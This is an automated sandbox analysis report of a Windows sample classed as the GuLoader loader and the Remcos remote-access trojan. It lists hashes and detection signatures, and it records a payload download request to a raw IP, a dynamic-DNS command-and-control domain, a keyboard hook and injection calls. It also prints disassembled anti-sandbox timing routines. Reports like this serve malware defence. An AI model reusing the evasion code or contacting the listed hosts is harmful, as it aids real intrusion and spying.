Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Sample Name:	kGSHiWbgq9.exe
Analysis ID:	457930
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for submitted file

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Machine Learning detection for sample

Source: kGSHiWbgq9.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 194.5.97.128:39200

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kGSHiWbgq9.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F90E6 NtProtectVirtualMemory,	1_2_020F90E6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873 NtWriteVirtualMemory,LoadLibraryA,	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968 NtAllocateVirtualMemory,	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A NtWriteVirtualMemory,	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62 NtWriteVirtualMemory,NtAllocateVirtualMemory,	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A NtWriteVirtualMemory,	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C NtWriteVirtualMemory,	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9 NtWriteVirtualMemory,	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8FBB NtProtectVirtualMemory,	1_2_020F8FBB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6 NtWriteVirtualMemory,	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C03 LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C03
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B39 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B39
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C2B LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569C2B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B22 LdrInitializeThunk,NtProtectVirtualMemory,	11_2_00569B22

Detected potential crypto function

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5781	1_2_020F5781
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F94D8	1_2_020F94D8
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F05A1	1_2_020F05A1
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0BDC	1_2_020F0BDC
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873	1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968	1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0211	1_2_020F0211
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4339	1_2_020F4339
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F40B7	1_2_020F40B7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0691	1_2_020F0691
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86DB	1_2_020F86DB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86F4	1_2_020F86F4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A	1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F95C6	1_2_020F95C6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F85E7	1_2_020F85E7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62	1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A	1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2A77	1_2_020F2A77
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3ACE	1_2_020F3ACE
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0B59	1_2_020F0B59
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C	1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9	1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3BFF	1_2_020F3BFF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8802	1_2_020F8802
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F891F	1_2_020F891F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0921	1_2_020F0921
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F398F	1_2_020F398F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7E5C	1_2_020F7E5C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1E99	1_2_020F1E99
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0ED2	1_2_020F0ED2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3	1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8C2C	1_2_020F8C2C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CEF	1_2_020F3CEF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0CFA	1_2_020F0CFA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CF2	1_2_020F3CF2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B	1_2_020F2D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5D78	1_2_020F5D78
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1DA0	1_2_020F1DA0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6	1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0DD5	1_2_020F0DD5

PE file contains strange resources

Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: kGSHiWbgq9.exe, 00000001.00000000.646609422.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 00000001.00000002.773544375.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000000.772049826.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726897873.0000000000860000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe

Uses 32bit PE files

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA49EFCEC46BBB65C.TMP

Jump to behavior

Source: kGSHiWbgq9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408873 push esp; ret	1_2_00408877
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004088C0 push esp; ret	1_2_004088CB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004014E9 push es; ret	1_2_004014EA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408CB2 push esi; ret	1_2_00408CB3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_0040891C push esi; retf	1_2_0040892F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407D36 pushad ; iretd	1_2_00407D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408672 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407E22 push ds; iretd	1_2_00407E27
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408624 push esp; ret	1_2_00408627
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408ADE push esi; retf	1_2_00408ADF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408695 push esi; ret	1_2_00408677
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F6625 push ebp; iretd	1_2_020F6637

Source: initial sample

Static PE information: section name: .text entropy: 7.07266809617

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3		1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B		1_2_020F2D3B

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7CB5 second address: 00000000020F7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B0E65173h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B0E65169h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B0E6506Ch 0x00000063 call 00007FB8B0E650C7h 0x00000068 call 00007FB8B0E65194h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7DF9 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0366842h 0x0000002e popad 0x0000002f call 00007FB8B03663C1h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
